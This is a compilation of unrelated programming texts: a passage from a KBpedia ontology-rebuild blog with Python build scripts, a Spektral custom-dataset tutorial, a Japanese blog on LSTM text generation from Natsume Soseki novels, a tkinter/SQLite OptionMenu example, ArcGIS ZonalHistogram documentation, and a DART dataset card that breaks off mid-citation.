One of these options (3) will require us to develop a new, separate routine (see below).
C. Propagate changes to other input files ((1), (2), (4))
With regard to replacing hyphens with underscores (1), this problem not only occurs when a property or class is declared, but all subsequent references to it. To make a global search-and-replace replacement of underscores for hyphens means all build files must be checked and processed. Any time changes are made to key input files (i.e., the ones of the variety), it is important to check appropriate other input files for consistency. We also need to maintain a mapping between the two ID forms so changed such that older URIs continue to point to the correct resources.struct
D. Re-build
Once all input files are modified and checked, we are ready to start the re-build.
General Processing Notes
The basic build process we are following is what was listed in the last installment, CWPK #47, applied in relation to our plan of attack.
I am recording notable observations from the pursuit of these steps. I am also logging time to provide a sense of overall set-up and processing times. There are, however, three areas that warrant separate discussion after this overall section.
As I progress through various steps, I tend to do two things. First, after a major step in the runs I bring up the interim build of KBpedia in Protégé and check to see if the assignments are being made properly. Depending on the nature of the step at-hand, I will look at different things. Second, especially in the early iterations of a build, I may backup my target ontology. Either I do this by stipulating a different output file in the routine, or create a physical file backup directly. Either way, I do this at these early phases to prevent having to go back to Square One with a particular build if the new build step proves a failure. With annotations, for example, revisions are added to what is already in the knowledge graph, as opposed to replacing the existing entries. This may not be the outcome you want.
The changes needed to KKO (A) above are straightforward to implement. We bring KKO into Protégé and make the changes. Only when the KKO baseline meets our requirements do we begin the formal build process.
The hyphen changes (1) were rather simple to do, but affected much in the four input files (two structural, two annotations for classes and properties). Though some identifiers had more than one hyphen, there were more than 7 K replacements for classes, and more than 13 K replacements for properties, for a total exceeding 20 K replacements across all build files (this amount will go up as we subsequently bring in the mappings to external sources as well; see next installment). I began with the structure files, since they have fewer fields and there were some open tasks on processing specific annotations.
This is a good example of a bulk move with a spreadsheet (see CWPK #36). Since there are fields such as alternative labels or definitions for which hyphens or dashes are fine, we do not want to do a global search-and-replace for underscores. Using the spreadsheet, the answer is to highlight the columns of interest (while using the menu-based search and replace) and only replace within the highlighted selection. If you make a mistake, Undo.
At the same time, I typically assign a name to the major block on the spreadsheet and then sort on various fields (columns) to check for things like open entries, strange characters (that often appear at the top or bottom of sorts), fields that improperly split in earlier steps (look for long ones), or other patterns to which your eye rapidly finds. If I EVER find an error, I try to fix it right then and there. It slows first iterations, but, over time, always fixing problems as discovered leads to cleaner and cleaner inputs.
Starting with the initial class backbone file (Generals_struct_out.csv) and routine (class_struct_builder), after getting the setting configurations set, I begin the run. It fails. This is actually to be expected, since it is an occasion worthy of celebration when a given large routine runs to completion without error on its first try!
On failures, one of the nice things about Python is a helpful ‘traceback’ on where the error occurred. Since we are processing tens of thousands of items at this class build point, we need to pinpoint in the code where the fail was occurring and add some print statements, especially ones that repeat to screen what items are currently going through the processing loop at the point of fail. Then, when you run again, you can see where in your input file the error likely occurs. Then, go back to the input file, and make the correction there.
Depending on the scope of your prior changes, these start-and-stop iterations of run-fail-inspect-correct may occur multiple times. You will eventually work your way through the input file if you are unlucky. But, you perhaps may not even notice any of this if you are lucky! (Of course, these matters are really not so much a matter of luck, since outcomes are improved by attention to detail.)
After a couple of iterations of minor corrections, first the classes and then the properties load properly with all sub- relationships intact. Pretty cool! I can smell the finish line.
In the shift to annotations, I basically wanted to load what had previously been tested and ingested without problems, and then concentrate on the new areas. The class annotation uploads went smoothly (only one hiccup for a mis-labeled resource). Great, so I can now take a quick detour to get rid of the superfluous links to OCyc (3) before facing the final step of bringing in the property annotations.
Another Cleaning Task
Before we can complete the third of our build steps involving the class_annot_builder function, we set for ourselves the removal of the open-source Cyc (OCyc) internal links in definitions. These all have the form of:
\<\a href="http://sw.opencyc.org/concept/Mx4rvVjk55wpEbGdrcN5Y29ycA">IndependentCountry\<\/a>
My desire is to remove all of the href link markup, but leave the label text between the <\a\> tags. I know I can use regular expressions to recognize a sub-string like the above, but I am no more than a toddler when it comes to formulating regex. Like many other areas in Python, I begin a search for modules that may make this task a bit easier.
I soon discovered there are multiple approaches, and my quick diligence suggests either the beautifulsoup or bleach modules may be best suited. I make the task slightly more complicated by wanting to limit the removal to OCyc links only, and to leave all other href’s.
I chose beautifulsoup because it is a widely used and respected library for Web scraping and many data processing tasks. I also realized this was a one-off occasion, so while I did write a routine, I chose not to include it in the utils module. I also excised the ‘definitions’ column from our input files, made the changes to it, and then uploaded the changes. In this manner, I was able to sidestep some of the general file manipulation requirements that a more commonly used utility would demand. Here is the resulting code:
import csv
from bs4 import BeautifulSoup # Part of the Anaconda distro
in_file = 'C:/1-PythonProjects/kbpedia/v300/build_ins/working/def_old.csv'
out_file = 'C:/1-PythonProjects/kbpedia/v300/build_ins/working/def_new.csv'
output = open(out_file, 'w+', encoding='utf8', newline='')
x = 0
with open(in_file, 'r', encoding='utf8') as f:
reader = csv.reader(f)
for row in reader:
line = str(row)
soup = BeautifulSoup(line) # You can feed bs4 with lines, docs, etc.
tags = soup.select('a[href^="http://sw.opencyc.org/"]') # The key for selecting out the OCyc stuff
if tags != []:
for item in tags: # Some entries have no tags, others a few
item.unwrap() # The main method for getting the text within tags
item_text = soup.get_text() # The text after tags removed
else:
item_text = line
item_text = item_text.replace("['","") # A bunch of 'hacky' cleanup of the output
item_text = item_text.replace("']","")
item_text = item_text.replace('["', '')
item_text = item_text.replace('"]', '')
item_text = item_text.replace("', '", ",")
print(item_text)
print(item_text, file=output)
x = x + 1
print(x, 'total items processed.')
output.close()
print('Definition modifications are complete.')
Figuring out this routine took more time than I planned. Part of the reason is that the ‘definitions’ in KBpedia are the longest and most complicated strings, with many clauses and formatting and quoted sections. So I had quoting conflicts that caused some of the 58 K entries to skip or combine with other lines. I wanted to make sure the correspondence was kept accurate. Another issue was figuring out the exact beautifulsoup syntax for identifying the specific OCyc links (with variable internal references) and extracting out the internal text for the link.
Nonetheless, beautifulsoup is a powerful utility, and I am glad I spent some time learning how to get to first twitch with it.
Updates to Domain and Range
Since the earlier version (2.50) of KBpedia did not have proper loads of domain and range, once I re-established those specifications I foresaw that ingest of these fields might be a problem. The reasons for this supposition are the variety of data types that one might encounter, plus we were dealing with object and data properties, which have a bit more structure and stronger semantics, as well as annotations, which pose different issues in language checks and longer strings.
I was not surprised, then, when this step proved to be the most challenging of the update.
First, indeed, there were more domain and range options as this revised routine indicates (compare to the smaller version in CWPK #47:
### KEY CONFIG SETTINGS (see build_deck in config.py) ###
# 'kb_src' : 'standard'
# 'loop_list' : file_dict.values(), # see 'in_file'
# 'loop' : 'property_loop',
# 'in_file' : 'C:/1-PythonProjects/kbpedia/v300/build_ins/properties/prop_annot_out.csv',
# 'out_file' : 'C:/1-PythonProjects/kbpedia/v300/target/ontologies/kbpedia_reference_concepts.csv',
def prop_annot_build(**build_deck):
print('Beginning KBpedia property annotation build . . .')
xsd = kb.get_namespace('http://w3.org/2001/XMLSchema#')
wgs84 = kb.get_namespace('http://www.opengis.net/def/crs/OGC/1.3/CRS84')
loop_list = build_deck.get('loop_list')
loop = build_deck.get('loop')
out_file = build_deck.get('out_file')
x = 1
if loop is not 'property_loop':
print("Needs to be a 'property_loop'; returning program.")
return
for loopval in loop_list:
print(' . . . processing', loopval)
in_file = loopval
with open(in_file, 'r', encoding='utf8') as input:
is_first_row = True
reader = csv.DictReader(input, delimiter=',', fieldnames=['id', 'prefLabel', 'subPropertyOf', 'domain',
'range', 'functional', 'altLabel', 'definition', 'editorialNote'])
for row in reader:
r_id = row['id']
r_pref = row['prefLabel']
r_dom = row['domain']
r_rng = row['range']
r_alt = row['altLabel']
r_def = row['definition']
r_note = row['editorialNote']
r_id = r_id.replace('rc.', '')
id = getattr(rc, r_id)
if id == None:
continue
if is_first_row:
is_first_row = False
continue
id.prefLabel.append(r_pref)
i_dom = r_dom.split('||')
if i_dom != ['']:
for item in i_dom: # We need to accommodate different namespaces
if 'kko.' in item:
item = item.replace('kko.', '')
item = getattr(kko, item)
id.domain.append(item)
elif 'owl.' in item:
item = item.replace('owl.', '')
item = getattr(owl, item)
id.domain.append(item)
elif item == ['']:
continue
elif item != '':
item = getattr(rc, item)
if item == None:
continue
else:
id.domain.append(item)
else:
print('No domain assignment:', 'Item no:', x, item)
continue
if 'owl.' in r_rng: # A tremendous number of range options
r_rng = r_rng.replace('owl.', '') # xsd datatypes are only partially supported
r_rng = getattr(owl, r_rng)
id.range.append(r_rng)
elif 'string' in r_rng:
id.range = [str]
elif 'decimal' in r_rng:
id.range = [float]
elif 'anyuri' in r_rng:
id.range = [normstr]
elif 'boolean' in r_rng:
id.range = [bool]
elif 'datetime' in r_rng:
id.range = [datetime.datetime]
elif 'date' in r_rng:
id.range = [datetime.date]
elif 'time' in r_rng:
id.range = [datetime.time]
elif 'wgs84.' in r_rng:
r_rng = r_rng.replace('wgs84.', '')
r_rng = getattr(wgs84, r_rng)
id.range.append(r_rng)
elif r_rng == ['']:
print('r_rng = empty:', r_rng)
else:
print('r_rng = else:', r_rng, id)
# id.range.append(r_rng)
i_alt = r_alt.split('||')
if i_alt != ['']:
for item in i_alt:
id.altLabel.append(item)
id.definition.append(r_def)
i_note = r_note.split('||')
if i_note != ['']:
for item in i_note:
id.editorialNote.append(item)
x = x + 1
kb.save(out_file, format="rdfxml")
print('KBpedia property annotation build is complete.')
Second, a number of the range types — xsd.anyURI, xsd.hexBinary, and wgs84 — are not supported internally by owlready2, and there is no facility to add them directly to the system. I have made outreach to the responsive developer of owlready2, Jean-Baptiste Lamy, to see whether we can fill this gap before we go live with KBpedia v. 300. (Update: Within two weeks, Jean-Baptiste responded with a fix and new definition capabilities.) Meanwhile, there are relatively few instances of this gap, so we are in pretty good shape to move forward as is. Only a handful of resources are affected by these gaps, out of a total of 58 K.
URI Changes
The changing of an identifier for a knowledge graph resource is not encouraged. Most semantic technology advice is simply to pick permanent or persistent URIs. There is thus little discussion or guidance as to what is best practice when an individual resource ID does need to change. Our change from hyphens to underscores
(1)is one such example of when an ID needs to change.
The best point of intervention is at the Web server, since our premise for knowledge graphs is Web-accessible information obtained via (generally) HTTP. While we could provide internal knowledge graph representations to capture the mapping between old and new URIs, an external request in the old form still needs to get a completion response for the new form. The best way to achieve that is via content negotiation by the server.
Under circumstances where prior versions of your knowledge graph were in broad use, the recommended approach would be to follow the guidelines of the W3C (the standards-setting body for semantic technologies) for how to publish a semantic Web vocabulary. This guidance is further supplemented with recipes for how to publish linked data under the rubric of ‘cool URIs‘. Following these guidances is much easier than updating URIs in place.
However, because of decisions yet to be documented to not implement linked data (see CWPK #60 when it is published in about three weeks), the approach we will be taking is much simpler. We will generate a mapping (correspondence) file between the older, retired URIs (the ones with the hyphens) with the new URIs (the ones with the underscores). We will announce this correspondence file at time of v 300 release, which we have earmarked to occur at the conclusion of this CWPK series. The responsibility for URI updates, if needed, will be placed on existing KBpedia users. This decision violates the recommended best practice of never changing URIs, but we deem it manageable based on our current user base and their willingness to make those modifications directly. Posting this correspondence fill will be one of the last steps before KBpedia v 300 goes fully ‘live’.
So, we completed the full build, but kept a copy of the one-step-last-removed to return to if (when) we get a better processing of range.
The effort was greater than I anticipated. Actual processing time for a full re-build across all steps was about 90 min. There was perhaps another 8-12 hrs in working through developing the code and solving (or mostly so) the edge cases.
This is the first time I have done this re-build process with Python, but it is a process I have used and learned to improve for nearly a decade. I’m pretty pleased about the build process itself, but am absolutely thrilled with the learning that has taken place to give me tools at-hand. I’m feeling really positive about how this CWPK series is unfolding.
Part IV Conclusion
This brings to a close Part IV in our CWPK series. When I first laid out the plan for this series, I told myself that eventual public release of the series and its installments depended on being able to fully ’roundtrip’ KBpedia. I was somewhat confident setting out that this milestone could be achieved. Today, I know it to be so, and so now can begin the next steps of releasing the installments and their accompanying Jupyter Notebook pages. Successfully achieving the roundtrip milestone in this objective means we began to publish the start of our CWPK series on July 27, 2020. Woohoo!
In terms of the overall plan, we are about 2/3 of the way through the entire anticipated series. We next tackle the remaining steps in completing a full, public release of the knowledge graph. Then, we use the completed KBpedia v 300 to put the knowledge graph through its paces, doing some analysis, some graphing, and some machine learning. As of this moment in time, we have a target of 75 total installments in this Cooking with Python and KBpedia series, which we hope to wrap up by mid-November or so. Please keep with us for the journey!
|
Creating a Custom Dataset
The Dataset class is a new feature of Spektral 1.0 that standardizes how graph datasets are represented in Spektral.
In this tutorial, we'll go over a simple example to create a custom dataset with your data.
This is also useful if you want to share you datasets publicly or include them as part of Spektral.
Essential information
You create a dataset by subclassing the spektral.data.Dataset class.
The core of datasets is the read() method. This is called at every instantiation of the dataset and must return a list of spektral.data.Graph.It doesn't matter if you read the data from a file or create it on the fly, this is where the dataset is loaded in memory.
All datasets have a path property that represents the directory in which the data is stored. This defaults to ~/.spektral/datasets/[ClassName].You can ignore it if you want.
However, each time you instantiate a Dataset it will check whether path exists. If it doesn't, the download() method will be called.
You can use download() to define any additional operations that are needed to save your raw data to disk. The method will be called before read().
Both read() and download() are called by the dataset's __init__() method. If you need to override the initialization of your dataset, make sure to call super().__init__() somewhere in your implementation (usually as the last line).
Example
This is a simple example that shows how to create a custom dataset with five random graphs. We pretend that the data comes from an online source so that we can show how to use download().
We start by overriding the __init__() method to store some custom parameters of the dataset:
class MyDataset(Dataset):
"""
A dataset of five random graphs.
"""
def __init__(self, nodes, feats, **kwargs):
self.nodes = nodes
self.feats = feats
super().__init__(**kwargs)
Remember to call super().__init__(**kwargs) as the last line.
Then, we simulate downloading the data from the web. Since this method gets called if path does not exist on the system, it makes sense to create the corresponding directory now:
def download(self):
data = ... # Download from somewhere
# Create the directory
os.mkdir(self.path)
# Write the data to file
for i in range(5):
x = rand(self.nodes, self.feats)
a = randint(0, 2, (self.nodes, self.nodes))
y = randint(0, 2)
filename = os.path.join(self.path, f'graph_{i}')
np.savez(filename, x=x, a=a, y=y)
Finally, we implement the read() method to return a list of Graph objects:
def read(self):
# We must return a list of Graph objects
output = []
for i in range(5):
data = np.load(os.path.join(self.path, f'graph_{i}.npz'))
output.append(
Graph(x=data['x'], a=data['a'], y=data['y'])
)
return output
We can now instantiate our dataset, which will "download" our data and read it into memory:
>>> dataset = MyDataset(3, 2)
>>> dataset
MyDataset(n_graphs=5)
We can see that our graphs were saved to file:
$ ls ~/.spektral/datasets/MyDataset/
graph_0.npz graph_1.npz graph_2.npz graph_3.npz graph_4.npz
so the next time we create MyDataset it will read from the files we have saved.
Remember that, if you want, you're free to store your data as you prefer. Datasets in Spektral are just there to simplify your workflow, but the library is still designed according to Keras' principle of not getting in your way. If you want to manipulate your data differently, your GNNs will still work.
You can also see this script for another example on how to create and use a custom dataset.
|
ディープラーニングで文章を自動生成したい!
はじめまして、Aidemy研修生のいとぅー(@andmohiko)です。
自然言語処理では文章の自動生成というテーマがあります。
今回は、夏目漱石っぽい文章を自動生成してみようと思います。
手法
LSTM-RNNを使います。
LSTMについては詳しくはこちら
簡単に説明すると、 ある長さの文字列から次の一文字を予測する ということをひたすら繰り返すことで文章が自動生成されていくというものです。
マルコフ連鎖は前の2文字しか見ないため、LSTMを使うことで文脈に沿った文章が生成されやすくなるという利点があります。
データセット
青空文庫で公開されている夏目漱石の「坊ちゃん」「吾輩は猫である」「こころ」「夢十夜」を使います。
こちら→作家別作品リスト:夏目 漱石
自然言語処理はデータを集めてくるのが大変なのでとてもありがたいですね。
前処理
ダウンロードしてきた本文にはルビや注釈なのど情報が含まれているため、 これらを削除し地の文のみにします。
import sys
import re
paths = ["bocchan.txt", "kokoro.txt", "wagahaiwa_nekodearu.txt", "yume_juya.txt"]
for path in paths:
bindata = open("./" + path, "rb")
lines = bindata.readlines()
for line in lines:
text = line.decode('Shift_JIS')
text = re.split(r'\r', text)[0]
text = re.split(r'底本', text)[0]
text = text.replace('|', '')
text = re.sub(r'《.+?》', '', text)
text = re.sub(r'[#.+?]', '' , text)
#print(text)
with open('./data_' + path, 'a', encoding='utf-8') as f:
f.write(text + '\n')
これを夏目漱石の他の作品についてもやり、最後に4作品を繋げて一つの長いテキストファイルにする。
TensorFlow + KerasでLSTMを実装
いよいよモデルを実装していきます。 Kerasを使いますが、裏側はTensorFlowのお世話になります。
from keras.models import Sequential,load_model
from keras.layers import Dense, Activation, LSTM
from keras.optimizers import RMSprop
from keras.utils.data_utils import get_file
import numpy as np
import random
import sys
path = "./data_souseki.txt"
bindata = open(path, "rb").read()
text = bindata.decode("utf-8")
print("Size of text: ",len(text))
chars = sorted(list(set(text)))
print("Total chars :",len(chars))
#辞書を作成する
char_indices = dict((c,i) for i,c in enumerate(chars))
indices_char = dict((i,c) for i,c in enumerate(chars))
#40文字の次の1文字を学習させる. 3文字ずつずらして40文字と1文字というセットを作る
maxlen = 40
step = 3
sentences = []
next_chars = []
for i in range(0, len(text)-maxlen, step):
sentences.append(text[i:i+maxlen])
next_chars.append(text[i+maxlen])
X = np.zeros((len(sentences),maxlen,len(chars)),dtype=np.bool)
y = np.zeros((len(sentences),len(chars)),dtype=np.bool)
for i, sentence in enumerate(sentences):
for t ,char in enumerate(sentence):
X[i,t,char_indices[char]] = 1
y[i,char_indices[next_chars[i]]] = 1
#テキストのベクトル化
X = np.zeros((len(sentences),maxlen,len(chars)),dtype=np.bool)
y = np.zeros((len(sentences),len(chars)),dtype=np.bool)
for i, sentence in enumerate(sentences):
for t ,char in enumerate(sentence):
X[i,t,char_indices[char]] = 1
y[i,char_indices[next_chars[i]]] = 1
#LSTMを使ったモデルを作る
model = Sequential() #連続的なデータを扱う
model.add(LSTM(128, input_shape=(maxlen,len(chars))))
model.add(Dense(len(chars)))
model.add(Activation("softmax"))
optimizer = RMSprop(lr = 0.01)
model.compile(loss="categorical_crossentropy",optimizer=optimizer)
def sample(preds, temperature=1.0):
preds = np.asarray(preds).astype("float64")
preds = np.log(preds) / temperature
exp_preds = np.exp(preds)
preds = exp_preds / np.sum(exp_preds)
probs = np.random.multinomial(1, preds, 1)
return np.argmax(probs)
#生成する
for iteration in range(1,30):
print()
print("-"*50)
print("繰り返し回数: ",iteration)
model.fit(X, y, batch_size=128, epochs=1)
start_index = random.randint(0, len(text)-maxlen-1)
for diversity in [0.2, 0.5, 1.0, 1.2]:
print()
print("-----diversity", diversity)
generated =""
sentence = text[start_index: start_index + maxlen ]
generated += sentence
print("-----Seedを生成しました: " + sentence + '"')
sys.stdout.write(generated)
#次の文字を予測して足す
for i in range(400):
x = np.zeros((1,maxlen,len(chars)))
for t,char in enumerate(sentence):
x[0, t, char_indices[char]] = 1
preds = model.predict(x, verbose =9)[0] #次の文字を予測
next_index = sample(preds, diversity)
next_char = indices_char[next_index]
generated += next_char
sentence = sentence[1:] + next_char
sys.stdout.write(next_char)
sys.stdout.flush()
print()
model.save('souseki_model.h5')
file = open('sousekigentext.txt','w+',encoding='utf-8').write(generated)
データ量が多いのでGPUを使わない場合は丸一日かかることもあります。しばらく放置しましょう。
学習の様子
今回は時間の都合でepoch数を30にしています。
1回目 loss関数: 4.1994
申しょいを少しも充に落ちる語ったかど勢だ」「いらせんと従ょいに詩に至った文考を逢ってかかり方でいし出である武び少しドャ大椀屋に見て、這入ったが内にステ動りら間」「人のく迷亭はかあした共安である。あるむを御当坊の起粧にな通ったの云き返す小ッちにも通ろ首の朝な性に学者口を高「え最がつけない」「すん、毫は食うんだ流山主人はレ一の子口学者は奥ずや。あ昔威横あが、しいくオあした 活で、学種爺とにこの作団だからパ気と云いえ面を見た。
読めない、、、
27回目
loss関数: 3.3512
大きな声を第一のはなかったから、それだから、どうかした事がない。その時の方だからしきりになっている事はないが、これからその事だから、自分でも、そのそとでない。吾輩は人間になると、吾輩には文明のごとくのはない。一るのは一際もなくなる。それなら飛び出して来たものがて来たのだが、またはなかったが、それではあいまさに、云わぬが、なるほどのところがある。ただ一人がいい。
結果と今後の発展
夏目漱石っぽい文章を生成することができました。 学習されていく過程を見ると徐々に日本語らしくなっていくところが見ていて楽しかったです。
loss関数が想定よりも小さくならなかったので、次やるときはloss関数の値を小さくするようにしたいです。 27回目の学習結果でも日本語として意味が成り立っているわけではないのがもうひといきな感じですね。loss関数が小さくなるとより日本語として意味が通ったものになりそうです。
今回は1文字ずつ予測していくことで文章を生成していましたが、単語分割をして一単語ずつ予測させるとより日本語っぽくなるかなと思いました。 また、夏目漱石っぽさを評価するために、何種類かの文章を用意してどれが夏目漱石の小説を学習させた結果かをアンケートでとるなどすると客観的に評価ができると思いました。
PythonやAIプログラミングを学ぶなら、オンライン制スクールのアイデミープレミアムプラン。
「機械学習・ディープラーニングに興味がある」
「AIをどのように活用するのだろう?」
「文系の私でもプログラミング学習を続けられるだろうか?」
少しでも気になることがございましたら、ぜひお気軽にAidemy Premium Planの無料相談会にお越しいただき、お悩みをお聞かせください!このほかにも、Aidemy MagazineとTwitter(@AidemyMagazine)ではたくさんのAI活用事例をご紹介しています。どちらも要チェック!それではまた次の記事でお会いしましょう。最後までご覧くださりありがとうございました。
|
Part I
Part II
Create a list by using data from SQLite student table
Create an OptionMenu by using the elements of the list to display the options
query="SELECT distinct(class) as class FROM student"
Getting records
query="SELECT distinct(class) as class FROM student"
r_set=my_conn.execute(query);
my_list = [r for r, in r_set] # create a list
We will connect
import tkinter as tk
my_w = tk.Tk()
my_w.geometry("250x200") # Size of the window
my_w.title("www.plus2net.com") # Adding a title
We will create a StringVar() and set the default value for the optionMenu.
options = tk.StringVar(my_w)
options.set(my_list[0]) # default value
Set the optionMenu and add the option values
om1 =tk.OptionMenu(my_w, options, *my_list)
om1.grid(row=2,column=5)
my_w.mainloop()
Full code is here
import sqlite3
my_conn = sqlite3.connect('my_db.db')
###### end of connection ####
query="SELECT distinct(class) as class FROM student"
r_set=my_conn.execute(query);
my_list = [r for r, in r_set] # create a list
import tkinter as tk
my_w = tk.Tk()
my_w.geometry("250x200") # Size of the window
my_w.title("www.plus2net.com") # Adding a title
options = tk.StringVar(my_w)
options.set(my_list[0]) # default value
om1 =tk.OptionMenu(my_w, options, *my_list)
om1.grid(row=2,column=5)
my_w.mainloop()
|
Available with Spatial Analyst license.
Summary
Creates a table and a histogram graph that show the frequency distribution of cell values on the Value input for each unique Zone.
Illustration
Usage
A zonal histogram enables you to investigate the frequency distribution of values in one dataset within classes of another dataset. Examples include slope distribution within land use classes, rainfall distribution within elevation classes, or crime distribution by police beat.
A zone is defined as all areas in the input that have the same value. The areas do not have to be contiguous. Both raster and feature can be used for the zone input.
When the Cell size of the Input raster or feature zone data (in_zone_data in Python) and the Input value raster (in_value_raster in Python) is different, the output cell size will be the Maximum Of Inputs, and the Input value raster will be used as the Snap Raster internally. If the cell size is same, but the cells are not aligned, the Input value raster will be used as the snap raster internally. Either of these cases will trigger an internal resampling before the zonal operation is performed.
When the zone and value inputs are both rasters of the same cell size and the cells are aligned, they will be used directly in the tool, and will not be resampled internally during the tool execution.
If the Input raster or feature zone data (in_zone_data in Python) is a raster, it must be an integer raster.
If the Input raster or feature zone data (in_zone_data in Python) is a feature, it will be converted to a raster internally, using the cell size and cell alignment from the Input value raster (in_value_raster in Python).
If the Input raster or feature zone data (in_zone_data in Python) is a point feature, it is possible to have more than one point contained within any particular cell of the value input raster. For such cells, the zone value is determined by the point with the lowest ObjectID field (for example, OID or FID).
If the Input raster or feature zone data (in_zone_data in Python) has overlapping polygons, the zonal analysis will not be performed for each individual polygon. Since the feature input is converted to a raster, each location can only have one value.
An alternative method is to process the zonal operation iteratively for each of the polygon zones and collate the results.
The Zone field (zone_field in Python) must be either integer or text type.
When specifying the Input raster or feature zone data (in_zone_data in Python), the default zone field will be the first available integer or text field. If no other valid fields exist, the ObjectID field (for example, OID or FID) will be the default.
In the histogram graph, the number of classes (bins) for each zone is determined by the Input value raster.
If a layer is specified, then the layer's symbology defines the number of classes.
If a dataset is specified, by default there will be 256 classes, unless the input is integer with less than 26 unique values, in which case it will be the total count of unique values.
A zonal histogram graph is not generated by default. To have it be created when the tool is run, specify the Output graph name.
The graph is temporary (in-memory) only. To make a permanent version of it, use the Save Graph tool to create a .grf graph file, or one of the other output formats available in that tool.
See Analysis environments and Spatial Analyst for additional details on the geoprocessing environments that apply to this tool.
Syntax
ZonalHistogram(in_zone_data, zone_field, in_value_raster, out_table, {out_graph})
Parameter Explanation Data Type
in_zone_data
Dataset that defines the zones.
The zones can be defined by an integer raster or a feature layer.
Raster Layer; Feature Layer
zone_field
Field that holds the values that define each zone.
It can be an integer or a string field of the zone dataset.
Field
in_value_raster
The raster values to create the histograms.
Raster Layer
out_table
The output table file.
The format of the table is determined by the output location and path. By default, the output will be a geodatabase table. If the path is not in a geodatabase, the format is determined by the extension. If the extension is .dbf, it will be in dBASE format. If no extension is specified, the output will be an INFO table.
The optional graph output is created from the information in the table.
Table
out_graph
(Optional)
The name of the output graph for display.
The graph is temporary. To persist it, use the Save Graph tool.
Graph
Code sample
ZonalHistogram example 1 (Python window)
This example creates a zonal histogram .dbf table.
import arcpy from arcpy import env from arcpy.sa import * env.workspace = "C:/sapyexamples/data" outZonHisto = ZonalHistogram("zoneras", "zonfield", "valueras", "znhist_tbl.dbf")
ZonalHistogram example 2 (stand-alone script)
This example creates a zonal histogram .dbf table and a graph file.
# Name: ZonalHistogram_Ex_02.py # Description: Creates a zonal histogram output table and # a graph showing the amount of value cells # for each unique input zone. # Requirements: Spatial Analyst Extension # Import system modules import arcpy from arcpy import env from arcpy.sa import * # Set environment settings env.workspace = "C:/sapyexamples/data" # Set local variables inZoneData = "zonras" zoneField = "zonfield" inValueRaster = "valueras" outTable = "C:/sapyexamples/output/zonehist_tbl.dbf" outGraph = "zonehist_gra" # Check out the ArcGIS Spatial Analyst extension license arcpy.CheckOutExtension("Spatial") # Execute ZonalHistogram ZonalHistogram(inZoneData, zoneField, inValueRaster, outTable, outGraph)
Environments
Licensing information
Basic: Requires Spatial Analyst
Standard: Requires Spatial Analyst
Advanced: Requires Spatial Analyst
|
Dataset Card Creation Guide
Table of Contents
Dataset Description
Dataset Structure
Dataset Creation
Considerations for Using the Data
Additional Information
Dataset Description
Dataset Summary
DART is a large dataset for open-domain structured data record to text generation. We consider the structured data record input as a set of RDF entity-relation triples, a format widely used for knowledge representation and semantics description. DART consists of 82,191 examples across different domains with each input being a semantic RDF triple set derived from data records in tables and the tree ontology of the schema, annotated with sentence descriptions that cover all facts in the triple set. This hierarchical, structured format with its open-domain nature differentiates DART from other existing table-to-text corpora.
Supported Tasks and Leaderboards
The task associated to DART is text generation from data records that are RDF triplets:
conditional-text-generation-other-rdf-to-text: The dataset can be used to train a model for text generation from RDF triplets, which consists in generating textual description of structured data. Success on this task is typically measured by achieving ahighBLEU, METEOR, BLEURT, TER, MoverScore, and BERTScore. The (BART-large model from BART) model currently achieves the following scores:
BLEU METEOR TER MoverScore BERTScore BLEURT
BART 37.06 0.36 0.57 0.44 0.92 0.22
This task has an active leaderboard which can be found here and ranks models based on the above metrics while also reporting.
Languages
The dataset is in english (en).
Dataset Structure
Data Instances
Here is an example from the dataset:
{'annotations': {'source': ['WikiTableQuestions_mturk'],
'text': ['First Clearing\tbased on Callicoon, New York and location at On NYS 52 1 Mi. Youngsville']},
'subtree_was_extended': False,
'tripleset': [['First Clearing', 'LOCATION', 'On NYS 52 1 Mi. Youngsville'],
['On NYS 52 1 Mi. Youngsville', 'CITY_OR_TOWN', 'Callicoon, New York']]}
It contains one annotation where the textual description is 'First Clearing\tbased on Callicoon, New York and location at On NYS 52 1 Mi. Youngsville'. The RDF triplets considered to generate this description are in tripleset and are formatted as subject, predicate, object.
Data Fields
The different fields are:
annotations:
text: list of text descriptions of the triplets
source: list of sources of the RDF triplets (WikiTable, e2e, etc.)
subtree_was_extended: boolean, if the subtree condidered during the dataset construction was extended. Sometimes this field is missing, and therefore set toNone
tripleset: RDF triplets as a list of triplets of strings (subject, predicate, object)
Data Splits
There are three splits, train, validation and test:
Tain Valid Test
N. Examples 30526 2768 6959
Dataset Creation
Curation Rationale
Automatically generating textual descriptions from structured data inputs is crucial to improving the accessibility of knowledge bases to lay users.
Source Data
DART comes from existing datasets that cover a variety of different domains while allowing to build a tree ontology and form RDF triple sets as semantic representations. The datasets used are WikiTableQuestions, WikiSQL, WebNLG and Cleaned E2E.
Initial Data Collection and Normalization
DART is constructed using multiple complementary methods: (1) human annotation on open-domain Wikipedia tables from WikiTableQuestions (Pasupat and Liang, 2015) and WikiSQL (Zhong et al., 2017), (2) automatic conversion of questions in WikiSQL to declarative sentences, and (3) incorporation of existing datasets including WebNLG 2017 (Gardent et al., 2017a,b; Shimorina and Gardent, 2018) and Cleaned E2E (Novikova et al., 2017b; Dušek et al., 2018, 2019)
Who are the source language producers?
[More Information Needed]
Annotations
DART is constructed using multiple complementary methods: (1) human annotation on open-domain Wikipedia tables from WikiTableQuestions (Pasupat and Liang, 2015) and WikiSQL (Zhong et al., 2017), (2) automatic conversion of questions in WikiSQL to declarative sentences, and (3) incorporation of existing datasets including WebNLG 2017 (Gardent et al., 2017a,b; Shimorina and Gardent, 2018) and Cleaned E2E (Novikova et al., 2017b; Dušek et al., 2018, 2019)
Annotation process
The two stage annotation process for constructing tripleset sentence pairs is based on a tree-structured ontology of each table. First, internal skilled annotators denote the parent column for each column header. Then, a larger number of annotators provide a sentential description of an automatically-chosen subset of table cells in a row.
Who are the annotators?
[More Information Needed]
Personal and Sensitive Information
[More Information Needed]
Considerations for Using the Data
Social Impact of Dataset
[More Information Needed]
Discussion of Biases
[More Information Needed]
Other Known Limitations
[More Information Needed]
Additional Information
Dataset Curators
[More Information Needed]
Licensing Information
Under MIT license (see here)
Citation Information
@article{radev2020dart,
title={DART: Open-Domain Structured Data Record to Text Generation},
